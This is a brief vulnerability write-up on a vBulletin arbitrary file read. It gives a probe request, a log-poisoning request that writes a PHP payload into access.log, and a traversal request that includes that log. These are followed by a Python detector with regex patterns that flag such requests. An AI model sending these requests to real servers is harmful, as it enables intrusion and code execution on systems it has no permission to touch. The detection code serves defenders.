vBulletin Arbitrary File Read

We can check if the server is vulnerable by sending the following GET request:

/index.php?routestring=.\\

If the response is:

[image]

The server is vulnerable.

If we want to inject PHP code into a file on the server, we can use access.log, for example:

/?LogINJ_START=<?php phpinfo();?>LogINJ_END

After that we can include access.log with our PHP code:

/index.php?routestring=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\xampp\\apache\\logs\\access.log
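For defenders, the requests above leave a recognizable trace in the web server log. The following is an added example, not part of the original write-up: a small detector that flags `routestring` values containing backslashes or dot-segments, and PHP open tags in the request line. It assumes Apache combined-format logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request field of an Apache access-log line: "METHOD URI PROTOCOL".
# The URI is matched lazily because a poisoned request may contain spaces.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<uri>.+?) HTTP/[\d.]+"')
# A legitimate route has no backslashes and no "." / ".." path segments.
TRAVERSAL_RE = re.compile(r'\\|(^|/)\.\.?(/|$)')
# PHP open tags written into the log are the log-poisoning step.
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)

def classify(line):
    """Return the list of findings for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    uri = m.group("uri")
    findings = []
    # Decode twice so single and double URL-encoding are both covered.
    if PHP_TAG_RE.search(unquote(unquote(uri))):
        findings.append("php-tag-in-request")
    for key, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        # parse_qsl already decoded once; decode again for double encoding.
        if key.lower() == "routestring" and TRAVERSAL_RE.search(unquote(value)):
            findings.append("routestring-traversal")
            break
    return findings

def scan(lines):
    """Return (line_number, findings) for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        findings = classify(line)
        if findings:
            hits.append((number, findings))
    return hits

# Constructed sample log lines (documentation IP range, made-up timestamps).
PREFIX = '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] '
SAMPLE_LOG = [
    PREFIX + r'"GET /index.php?routestring=.\\ HTTP/1.1" 200 5120',
    PREFIX + r'"GET /?LogINJ_START=<?php phpinfo();?>LogINJ_END HTTP/1.1" 200 5120',
    PREFIX + r'"GET /index.php?routestring=\\..\\..\\xampp\\apache\\logs\\access.log HTTP/1.1" 200 9000',
    PREFIX + r'"GET /index.php?routestring=forum/general HTTP/1.1" 200 300',
    PREFIX + r'"GET /index.php?routestring=%5C%5C..%5C%5C..%5C%5Clogs HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

A `php-tag-in-request` hit followed by a `routestring-traversal` hit from the same client is the sequence described above and is worth treating as an incident rather than a probe.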
